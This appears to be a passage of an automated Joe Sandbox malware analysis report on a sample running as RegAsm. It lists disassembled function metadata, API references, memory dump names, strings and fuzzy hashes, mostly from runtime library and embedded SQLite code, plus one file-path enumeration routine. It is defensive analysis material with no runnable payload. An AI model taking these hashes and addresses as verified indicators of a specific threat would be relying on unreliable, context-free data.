DecodePointer.KERNEL32(0042E8A8,00000020,0041C428,00000000,00000001,00000000,?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D), ref: 0041C321
DecodePointer.KERNEL32(?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822), ref: 0041C332

Part of subcall function 0041B8AA: EncodePointer.KERNEL32(00000000,0041F47C,00642400,00000314,00000000,?,?,?,?,?,0041C63F,00642400,Microsoft Visual C++ Runtime Library,00012010), ref: 0041B8AC

DecodePointer.KERNEL32(-00000004,?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822), ref: 0041C358
DecodePointer.KERNEL32(?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822), ref: 0041C36B
DecodePointer.KERNEL32(?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822), ref: 0041C375

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: bb10800c0d419d9d7c04633c4765f91ceac3c517b12544c32c546b9a078549f1
Instruction ID: e2b3956bf5e94b2baf730586d1c238e8b3fbb8ba7e12c12fc2e7ba7e24f6204d
Opcode Fuzzy Hash: bb10800c0d419d9d7c04633c4765f91ceac3c517b12544c32c546b9a078549f1
Instruction Fuzzy Hash: 4531293094031ADFDF10AFA5DC846EDBBB2BF49314F64802BE524A6250DBBC58919F6D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B0B0 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041B0BC

Part of subcall function 0041BA14: __getptd_noexit.LIBCMT ref: 0041BA17
Part of subcall function 0041BA14: __amsg_exit.LIBCMT ref: 0041BA24

__amsg_exit.LIBCMT ref: 0041B0DC
__lock.LIBCMT ref: 0041B0EC
InterlockedDecrement.KERNEL32(?), ref: 0041B109
_free.LIBCMT ref: 0041B11C
InterlockedIncrement.KERNEL32(004301C0), ref: 0041B134

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 3bb7098c004e6e0b868fb9e12c9edf3dfe0681dcdbad557e99bda5bbdbeb0f1b
Instruction ID: 1427177a95c760848ccbda204b7d26ea2269305e609c9ae0dd80fe0dd36cfa04
Opcode Fuzzy Hash: 3bb7098c004e6e0b868fb9e12c9edf3dfe0681dcdbad557e99bda5bbdbeb0f1b
Instruction Fuzzy Hash: 5F01C431A01611ABDB20AB6598157EE7760FF08764F11411BE45063390C73C9EC2CFDE

Uniqueness

Uniqueness Score: -1.00%

Function 19D6BF00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 156COMMON

Download Yara Rule

Strings

phrase, xrefs: 19D6C035, 19D6C042
fts5 expression tree is too large (maximum depth %d), xrefs: 19D6C070
fts5: %s queries are not supported (detail!=full), xrefs: 19D6C043
NEAR, xrefs: 19D6C03A

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: NEAR$fts5 expression tree is too large (maximum depth %d)$fts5: %s queries are not supported (detail!=full)$phrase
API String ID: 0-593389478
Opcode ID: c43e6254c2f0ebfb508613e6eb4f42ba81a47990660b3518b5e44d943144c3d3
Instruction ID: 0120cbe9b83f0ca8d7e6b169f9ccae29cf4e103d5a7f8ec64085e31e57e2ac58
Opcode Fuzzy Hash: c43e6254c2f0ebfb508613e6eb4f42ba81a47990660b3518b5e44d943144c3d3
Instruction Fuzzy Hash: 45410735E042069FD714CE28DA80B5AB3A4FF84314F18856DE9468BAB1E77AFC45CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00417620 Relevance: 8.9, APIs: 7, Instructions: 123stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00000104,01461D70), ref: 00417697

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

lstrcat.KERNEL32(?,00000000), ref: 004176BE
lstrcat.KERNEL32(?,?), ref: 004176DE
lstrcat.KERNEL32(?,?), ref: 004176F2
lstrcat.KERNEL32(?,014539C0), ref: 00417705
lstrcat.KERNEL32(?,?), ref: 00417719
lstrcat.KERNEL32(?,01461578), ref: 0041772D

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00411690: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421FB8,000000FF,?,0040E94A,?,00000000,00000000,00000000), ref: 004116B7

Part of subcall function 004173C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004173EE
Part of subcall function 004173C0: HeapAlloc.KERNEL32(00000000), ref: 004173F5
Part of subcall function 004173C0: wsprintfA.USER32 ref: 0041740E
Part of subcall function 004173C0: FindFirstFileA.KERNEL32(?,?), ref: 00417425

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: 8876f39cce22fdb87c7a47d4661a8add8284090edec9c7919bf3d1b7426972d0
Instruction ID: 9e94d96a6c2fa7cf23f7c992aa699a2e18ad3ccda8d2e94c686f4496ebe02aa9
Opcode Fuzzy Hash: 8876f39cce22fdb87c7a47d4661a8add8284090edec9c7919bf3d1b7426972d0
Instruction Fuzzy Hash: 08419AB5900219ABCB10EBA1CC46FDD7778AB0D704F40459EF715A3191DB78A788CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040F7A0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F7BA

Part of subcall function 0041FC60: std::exception::exception.LIBCMT ref: 0041FC75
Part of subcall function 0041FC60: __CxxThrowException@8.LIBCMT ref: 0041FC8A
Part of subcall function 0041FC60: std::exception::exception.LIBCMT ref: 0041FC9B

std::_Xinvalid_argument.LIBCPMT ref: 0040F7F7

Part of subcall function 0041FC13: std::exception::exception.LIBCMT ref: 0041FC28
Part of subcall function 0041FC13: __CxxThrowException@8.LIBCMT ref: 0041FC3D
Part of subcall function 0041FC13: std::exception::exception.LIBCMT ref: 0041FC4E

memcpy.MSVCRT ref: 0040F858

Strings

string too long, xrefs: 0040F7F2
invalid string position, xrefs: 0040F7B5

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$memcpy
String ID: invalid string position$string too long
API String ID: 85833692-4289949731
Opcode ID: 259f7feb66d68c8b8732089a7e33fb221ea85756fea1742300547b64a0c07829
Instruction ID: fd4a6935f257f4bdd60dc841e67110243277f01f0b010555ef6c2c1b1382e91b
Opcode Fuzzy Hash: 259f7feb66d68c8b8732089a7e33fb221ea85756fea1742300547b64a0c07829
Instruction Fuzzy Hash: 9F31F4333002149BD730AE5CE880BAAF399EBA1764B24093FF141DB6C1D775DC4983A9

Uniqueness

Uniqueness Score: -1.00%

Function 19C77050 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

Strings

API call with %s database connection pointer, xrefs: 19C77074
out of memory, xrefs: 19C77059, 19C770A2
invalid, xrefs: 19C7706F
bad parameter or other API misuse, xrefs: 19C77083

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: API call with %s database connection pointer$bad parameter or other API misuse$invalid$out of memory
API String ID: 0-453588374
Opcode ID: 8780d5e74ce8d3fe06a7d0c066df0400f9be85ca0d1d4f1c02c14058728aa280
Instruction ID: 0ad3724a1f8a036ffa0368372d7f011d751d99c98d7e454242c6475d9265c895
Opcode Fuzzy Hash: 8780d5e74ce8d3fe06a7d0c066df0400f9be85ca0d1d4f1c02c14058728aa280
Instruction Fuzzy Hash: 90315CB7A0434887EF1D4725FC0BB9B33575B80304FAD8429E4DA8BBC2E526E8478391

Uniqueness

Uniqueness Score: -1.00%

Function 19CF93A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19CF9446, 19CF948A
database corruption, xrefs: 19CF9450, 19CF9494
%s at line %d of [%.10s], xrefs: 19CF9455, 19CF9499

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 6986c8b8b4bf75ede1cf54f1b9715d30e9f0f5a7aedb652287e03fd62befbb74
Instruction ID: 7d01215da911f08e21d37f4b5d97603ed994f02e5adbccb1fc7267de6dd485a4
Opcode Fuzzy Hash: 6986c8b8b4bf75ede1cf54f1b9715d30e9f0f5a7aedb652287e03fd62befbb74
Instruction Fuzzy Hash: BD315836640B904BC724DF29D890AF3BFF29F55711B98845CE9C24B796E732E842CB60

Uniqueness

Uniqueness Score: -1.00%

Function 19C51C60 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C51D3C
unknown database: %s, xrefs: 19C51CBD
misuse, xrefs: 19C51D46
%s at line %d of [%.10s], xrefs: 19C51D4B

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unknown database: %s
API String ID: 0-142545749
Opcode ID: 32500f33b56783e203641610ec8e10fd752752dde09057e3228080d0baf6f832
Instruction ID: 77753281b343dcff3b22072e3b06a9389f875df39ac6f49256c7ddeb9a7a36bf
Opcode Fuzzy Hash: 32500f33b56783e203641610ec8e10fd752752dde09057e3228080d0baf6f832
Instruction Fuzzy Hash: BC214776600790ABF7119B26EC88F977BA9AFC1369F1C052CF89A572C1D732E4008376

Uniqueness

Uniqueness Score: -1.00%

Function 19C83FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C8407D, 19C840A8
database corruption, xrefs: 19C84087, 19C840B2
%s at line %d of [%.10s], xrefs: 19C8408C, 19C840B7

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: e48418b1412880d60a4bf96d523ba1b47a3f5f858f83a46dabc2c344a79a5ec8
Instruction ID: 5eaa5dcb2d37e1c5dbf62e00961bab35ad11636a59460b3a24a07a5101ba9a26
Opcode Fuzzy Hash: e48418b1412880d60a4bf96d523ba1b47a3f5f858f83a46dabc2c344a79a5ec8
Instruction Fuzzy Hash: DC2128776402215BC700DE08EC409FBBBE0EB84A21F89453AFD84D7341E725D549C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 19CF9290 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19CF929C, 19CF932A
database corruption, xrefs: 19CF92A6, 19CF9334
%s at line %d of [%.10s], xrefs: 19CF92AB, 19CF9339

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 9f63ef43a5964c9b72427a1e2a6228db14c9e9bdf974dfca040cd901e6cb7eb0
Instruction ID: 66209201bbc5257bbaf6f3938a9f80d9873f22934d037b6ab2f99ef8c9e479bc
Opcode Fuzzy Hash: 9f63ef43a5964c9b72427a1e2a6228db14c9e9bdf974dfca040cd901e6cb7eb0
Instruction Fuzzy Hash: 9B213736644BA05BC721DB28EC80AF3BFF19F05210B8D895CE1D287796E232E4858751

Uniqueness

Uniqueness Score: -1.00%

Function 19C633C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN), xrefs: 19C633D6

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN)
API String ID: 0-1935849370
Opcode ID: e994d7f808833fbe827c4a9f6a6445e99c95a842f14982c62c83e484a6c116d4
Instruction ID: d5f8945a35d8ba52e83a72763158c61712bdae0bf871b4046ca0a6db695d007b
Opcode Fuzzy Hash: e994d7f808833fbe827c4a9f6a6445e99c95a842f14982c62c83e484a6c116d4
Instruction Fuzzy Hash: 2F01D23A7042138BD702DF19E840B8AB3E6EFC5311F19C176F6408B280EB70A48787A1

Uniqueness

Uniqueness Score: -1.00%

Function 19D23E10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON

Download Yara Rule

Strings

Wrong number of entries in %%%s table - expected %lld, actual %lld, xrefs: 19D23E6C
SELECT count(*) FROM %Q.'%q%s', xrefs: 19D23E26

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: SELECT count(*) FROM %Q.'%q%s'$Wrong number of entries in %%%s table - expected %lld, actual %lld
API String ID: 0-3026403748
Opcode ID: a0b836656dfc988c743a3b63e04122b5b6ec561d8f79577cd1d0b64dea8d97b8
Instruction ID: da4a4184dc6056829cbbd40a8a81f076e46cdfe25552ff1f9e71625503d45240
Opcode Fuzzy Hash: a0b836656dfc988c743a3b63e04122b5b6ec561d8f79577cd1d0b64dea8d97b8
Instruction Fuzzy Hash: A3F044B6D002416BCB129A00EC42E2FB6E5BFC4E18F5D4A2CF08AA6660DB25F4549663

Uniqueness

Uniqueness Score: -1.00%

Function 19DF5BC1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,3798474A,?,?,00000000,19E4D1CB,000000FF,?,19DF5B30,?,?,19DF5ADF,?), ref: 19DF5BF6
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 19DF5C08
FreeLibrary.KERNEL32(00000000,?,?,00000000,19E4D1CB,000000FF,?,19DF5B30,?,?,19DF5ADF,?), ref: 19DF5C2A

Strings

CorExitProcess, xrefs: 19DF5C00
mscoree.dll, xrefs: 19DF5BEF

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
